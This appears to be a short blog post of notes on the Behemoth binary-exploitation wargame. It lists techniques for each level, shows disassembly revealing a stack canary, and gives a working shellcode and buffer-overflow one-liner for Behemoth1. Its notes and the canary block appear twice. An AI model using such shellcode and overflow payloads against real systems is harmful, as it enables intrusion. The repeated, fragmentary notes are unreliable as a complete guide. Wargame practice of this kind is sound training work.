Behemoth is the next suggested level after narnia, while it still binary exploitation it does not provide the source code of the challenges. Thus requiring users to read the assembly code.
Behemoth0:
ltrace, strings
Behemoth1:
Shellcode Injections , buffer overflow
Absolute adressing
Just a comment :
Reading the main code this time we can see that that canary protection has been activated. You can see this using the following code
0x08048579 <+12>: mov %gs:0x14,%eax
0x0804857f <+18>: mov %eax,0x9c(%esp)
0x08048586 <+25>: xor %eax,%eax
0x08048620 <+179>: mov 0x9c(%esp),%edx
0x08048627 <+186>: xor %gs:0x14,%edx
0x0804862e <+193>: je 0x8048635 <main+200>
0x08048630 <+195>: call 0x80483f0 <__stack_chk_fail@plt>
Behemoth0:
ltrace, strings
Behemoth1:
Shellcode Injections , buffer overflow
export LOGNAME=$(python -c "print '\"' + '\x90'*58 +'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\"'")
(python -c "print '\x61'*79+ '\xfe\xde\xff\xff'";cat )| ./behemoth1
Behemoth2:Absolute adressing
Just a comment :
Reading the main code this time we can see that that canary protection has been activated. You can see this using the following code
0x08048579 <+12>: mov %gs:0x14,%eax
0x0804857f <+18>: mov %eax,0x9c(%esp)
0x08048586 <+25>: xor %eax,%eax
0x08048620 <+179>: mov 0x9c(%esp),%edx
0x08048627 <+186>: xor %gs:0x14,%edx
0x0804862e <+193>: je 0x8048635 <main+200>
0x08048630 <+195>: call 0x80483f0 <__stack_chk_fail@plt>
No comments:
Post a Comment